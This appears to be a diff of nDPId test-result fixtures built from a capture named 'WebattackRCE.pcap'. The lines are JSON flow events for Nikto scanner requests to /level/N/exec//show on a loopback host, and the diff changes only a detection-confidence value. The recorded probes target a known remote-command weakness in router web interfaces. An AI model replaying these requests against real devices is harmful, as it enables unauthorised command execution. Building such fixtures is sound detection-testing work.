+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277584,"pkt":"AAAAAAAAAAAAAAAACABFAADIKRRAAEAGExp\/AAABfwAAAcYIH5CpMBHnxNoUUoAYAED+vAAAAQEICp1m\/nidZv54R0VUIC9sZXZlbC8xOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjYpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277586,"pkt":"AAAAAAAAAAAAAAAACABFAADIukpAAEAGgeN\/AAABfwAAAcYKH5AiT4K97CCbIYAYAED+vAAAAQEICp1m\/nqdZv56R0VUIC9sZXZlbC8yMC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277588,"pkt":"AAAAAAAAAAAAAAAACABFAADIUb5AAEAG6m9\/AAABfwAAAcYMH5BdL2lKom\/agYAYAED+vAAAAQEICp1m\/nydZv58R0VUIC9sZXZlbC8yMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277590,"pkt":"AAAAAAAAAAAAAAAACABFAADIMkhAAEAGCeZ\/AAABfwAAAcYOH5Ck4gq0tTkM3YAYAED+vAAAAQEICp1m\/n6dZv5+R0VUIC9sZXZlbC8yMi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjkpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277592,"pkt":"AAAAAAAAAAAAAAAACABFAADIGgdAAEAGIid\/AAABfwAAAcYQH5AVMSL0hIVMXoAYAED+vAAAAQEICp1m\/oCdZv5\/R0VUIC9sZXZlbC8yMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277593,"pkt":"AAAAAAAAAAAAAAAACABFAADI3vBAAEAGXT1\/AAABfwAAAcYSH5AD6eYZLZCITIAYAED+vAAAAQEICp1m\/oGdZv6BR0VUIC9sZXZlbC8yNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277595,"pkt":"AAAAAAAAAAAAAAAACABFAADIjYJAAEAGrqt\/AAABfwAAAcYUH5BJPLV3Xqa0Y4AYAED+vAAAAQEICp1m\/oOdZv6DR0VUIC9sZXZlbC8yNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277597,"pkt":"AAAAAAAAAAAAAAAACABFAADI4QFAAEAGWyx\/AAABfwAAAcYWH5APltgJOmv38YAYAED+vAAAAQEICp1m\/oSdZv6ER0VUIC9sZXZlbC8yNi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjczKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 